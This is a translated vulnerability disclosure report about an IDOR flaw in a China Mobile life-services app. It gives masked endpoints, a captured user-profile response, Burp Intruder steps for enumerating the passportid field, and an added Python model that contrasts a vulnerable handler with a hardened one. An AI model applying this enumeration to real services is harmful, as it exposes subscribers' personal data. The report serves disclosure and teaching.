2015-10-10: Details sent to the vendor; awaiting the vendor's response
2015-10-14: Vendor confirmed; details disclosed to the vendor only
2015-10-24: Details disclosed to core white hats and experts in the relevant field
2015-11-03: Details disclosed to regular white hats
2015-11-13: Details disclosed to intern white hats
2015-11-28: Details disclosed to the public
User information leak; can be harvested in bulk
Route the phone's traffic through Burp as its proxy, log in to the "和生活" (He Shenghuo) app and open "Communication Bill":
**.**.**.**/3g/3/life/CommunicationBill/index.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841377
Call charge usage:
**.**.**.**/3g/3/life/CommunicationBill/getBusiness.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841378
Under the subscription information, tap "Personal Profile". The response to that request is:
HTTP/1.1 200 OK
Date: Fri, 09 Oct 2015 16:20:12 GMT
msgversion: 1.0.0
transactionid: 20040
sendareacode: 000001
sendaddress: 99030000
recvareacode: 000002
recvaddress: 00010
Content-Type: text/html;charset=UTF-8
Server: Jetty(7.6.3.v20120416)
Content-Length: 1402

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<root>
  <msgname>getuserinforesp</msgname>
  <transactionid>20040</transactionid>
  <timestamp>20151010003022</timestamp>
  <result>001000</result>
  <resultdesc>success</resultdesc>
  <body>
    <userinfo>
      <passportid>A201301120019908****</passportid>
      <mobnum>1350766****</mobnum>
      <mail>*****@**.**.**.**</mail>
      <username></username>
      <userclass>0</userclass>
      <eccode></eccode>
      <areacode>411700</areacode>
      <name></name>
      <sex>0</sex>
      <birthday></birthday>
      <address></address>
      <postcode></postcode>
      <userlogolist/>
      <interests></interests>
      <profession></profession>
      <idcard></idcard>
      <married>0</married>
      <havechildren>0</havechildren>
      <salary></salary>
      <school></school>
      <nationality></nationality>
      <folk></folk>
      <polity></polity>
      <faith></faith>
      <emailstatus>0</emailstatus>
      <phonestatus>0</phonestatus>
      <userstatus>0</userstatus>
      <extensioninfos/>
      <agreementstatus>1</agreementstatus>
      <memberorderstatus>0</memberorderstatus>
    </userinfo>
  </body>
</root>
Send the request to Burp's Intruder and mark the passportid as the payload position:
<passportid>A201301120019908$****$</passportid>
That field is the key. The server returns whichever user's profile matches the passportid in the request, without checking that it belongs to the logged-in session, so generating a dictionary for the masked digits and running the attack walks through other subscribers' records.
Work it out yourselves.
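The following is an added example, not code from the original report or from the vendor. It models the enumeration described above offline: it builds the Intruder-style dictionary for the masked passportid digits, parses a getuserinforesp body in the shape shown above to decide whether a probe leaked a phone number or e-mail, and contrasts a handler that trusts the client-supplied passportid (the flaw) with one that binds the lookup to the session's own id (the fix). Everything in it is constructed: the user store, the full passportid values, the failure result code 001001, and the handler function names are assumptions made for the example, not the vendor's backend.

```python
import xml.etree.ElementTree as ET

# Constructed sample bodies in the shape of the getuserinforesp shown above.
# Every identifier here (passportid, mobnum, mail) is made up; the failure
# result code 001001 is an assumption, not the vendor's documented value.
LEAK_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    "<root><msgname>getuserinforesp</msgname><transactionid>20040</transactionid>"
    "<result>001000</result><resultdesc>success</resultdesc>"
    "<body><userinfo><passportid>A2013011200199081234</passportid>"
    "<mobnum>13507661234</mobnum><mail>someone@example.com</mail>"
    "<areacode>411700</areacode></userinfo></body></root>"
)
EMPTY_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    "<root><msgname>getuserinforesp</msgname><transactionid>20041</transactionid>"
    "<result>001001</result><resultdesc>user not found</resultdesc><body/></root>"
)


def passportid_payloads(prefix="A201301120019908", width=4):
    """Intruder-style dictionary: the fixed prefix followed by every
    zero-padded number of the given width (10**width candidates)."""
    return [f"{prefix}{n:0{width}d}" for n in range(10 ** width)]


def parse_userinfo(xml_text):
    """Return the <userinfo> fields as a dict, or None if the body is not a
    successful getuserinforesp (result 001000) carrying a userinfo element."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.findtext("msgname") != "getuserinforesp":
        return None
    if root.findtext("result") != "001000":
        return None
    userinfo = root.find("body/userinfo")
    if userinfo is None:
        return None
    return {child.tag: (child.text or "") for child in userinfo}


def is_pii_leak(xml_text):
    """The grep rule an Intruder run would be sorted on: a successful response
    that exposes a phone number or e-mail address for the probed passportid."""
    info = parse_userinfo(xml_text)
    return bool(info and (info.get("mobnum") or info.get("mail")))


# Constructed user store standing in for the backend the endpoint queries.
USER_DB = {
    "A2013011200199081234": {"mobnum": "13507661234", "mail": "someone@example.com"},
    "A2013011200199085678": {"mobnum": "13507665678", "mail": "other@example.com"},
}


def getuserinfo_vulnerable(db, session_passportid, requested_passportid):
    """The flaw: the passportid in the request body is trusted as-is, so any
    caller with a valid session can read any subscriber's record."""
    return db.get(requested_passportid)


def getuserinfo_hardened(db, session_passportid, requested_passportid):
    """The fix: the server-side session decides whose record is returned; a
    client-supplied passportid is honoured only if it matches the session."""
    if requested_passportid != session_passportid:
        return None
    return db.get(session_passportid)


def enumerate_records(handler, db, session_passportid, payloads):
    """Replay the dictionary through a handler, as Intruder would against the
    live endpoint, and collect every record the handler gives up."""
    hits = {}
    for pid in payloads:
        record = handler(db, session_passportid, pid)
        if record:
            hits[pid] = record
    return hits


if __name__ == "__main__":
    attacker = "A2013011200199081234"  # the id of the attacker's own session
    payloads = passportid_payloads()
    print("vulnerable:", sorted(enumerate_records(getuserinfo_vulnerable, USER_DB, attacker, payloads)))
    print("hardened:  ", sorted(enumerate_records(getuserinfo_hardened, USER_DB, attacker, payloads)))
    print("leak?", is_pii_leak(LEAK_RESPONSE), is_pii_leak(EMPTY_RESPONSE))
```

Against the vulnerable handler the full 10,000-entry dictionary returns every record in the store; against the hardened one it returns only the attacker's own. The same shape of check applies to the msisdn parameter in the bill URLs above: an identifier the client can type into a request is a lookup key, never proof of authorization.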
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-10-14 17:13
CNVD confirmed and reproduced the reported issue and has passed it to CNCERT to notify China Mobile Group, which will coordinate handling with the site's administration department.
None yet.